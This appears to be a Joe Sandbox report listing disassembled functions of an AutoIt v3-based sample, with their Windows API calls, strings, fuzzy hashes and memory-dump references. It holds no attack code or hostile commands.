                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                        • String ID:
                                                                        • API String ID: 69173610-0
                                                                        • Opcode ID: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                                        • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                        • Opcode Fuzzy Hash: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                                                                        • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                        Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004590F2
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                        • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                        • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                        • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                        • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                        • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                        • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                        Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-3360698832
                                                                        • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                        • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                        • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                        • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                        Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                        • SetCursor.USER32(00000000), ref: 0043075B
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                        • SetCursor.USER32(00000000), ref: 00430773
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                        • SetCursor.USER32(00000000), ref: 0043078B
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                        • SetCursor.USER32(00000000), ref: 004307A3
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                        • SetCursor.USER32(00000000), ref: 004307BB
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                        • SetCursor.USER32(00000000), ref: 004307D3
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                        • SetCursor.USER32(00000000), ref: 004307EB
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                        • SetCursor.USER32(00000000), ref: 00430803
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                        • SetCursor.USER32(00000000), ref: 0043081B
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                        • SetCursor.USER32(00000000), ref: 00430833
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                        • SetCursor.USER32(00000000), ref: 0043084B
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                        • SetCursor.USER32(00000000), ref: 00430863
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                        • SetCursor.USER32(00000000), ref: 0043087B
                                                                        • SetCursor.USER32(00000000), ref: 00430887
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                        • SetCursor.USER32(00000000), ref: 0043089F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load
                                                                        • String ID:
                                                                        • API String ID: 1675784387-0
                                                                        • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                        • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                        • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                        Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(0000000E), ref: 00430913
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                        • GetSysColor.USER32(00000012), ref: 00430933
                                                                        • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                        • GetSysColor.USER32(0000000F), ref: 00430959
                                                                        • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                        • GetSysColor.USER32(00000011), ref: 00430979
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                        • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                        • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                        • SelectObject.GDI32(?,?), ref: 004309B4
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                        • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                        • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                        • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                        • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                        • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                        • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                        • DeleteObject.GDI32(?), ref: 00430AE9
                                                                        • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                        • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1582027408-0
                                                                        • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                                        • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                        • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                                                                        • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                        Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseConnectCreateRegistry
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 3217815495-966354055
                                                                        • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                                        • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                        • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                                                                        • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                        Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004566AE
                                                                        • GetDesktopWindow.USER32 ref: 004566C3
                                                                        • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                        • DestroyWindow.USER32(?), ref: 00456746
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                        • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                        • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                        • IsWindowVisible.USER32(?), ref: 0045682C
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                        • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                        • GetWindowRect.USER32(?,?), ref: 00456873
                                                                        • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                        • CopyRect.USER32(?,?), ref: 004568BE
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                        • String ID: ($,$tooltips_class32
                                                                        • API String ID: 225202481-3320066284
                                                                        • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                        • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                        • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                        • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                        Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                        • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                        • CloseClipboard.USER32 ref: 0046DD0D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                        • CloseClipboard.USER32 ref: 0046DD41
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                        • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                        • CloseClipboard.USER32 ref: 0046DD99
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                        • String ID:
                                                                        • API String ID: 15083398-0
                                                                        • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                        • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                        • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                        Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                        • GetClientRect.USER32(?,?), ref: 00471D05
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                        • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                        • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                        • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                        • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                        • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                        • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                        • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                        • String ID: @$AutoIt v3 GUI
                                                                        • API String ID: 867697134-3359773793
                                                                        • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                        • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                                                                        • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                        Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 1503153545-1459072770
                                                                        • Opcode ID: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                                                                        • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                        • Opcode Fuzzy Hash: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                                                                        • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                        Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$__wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                        • API String ID: 790654849-32604322
                                                                        • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                        • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                        • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
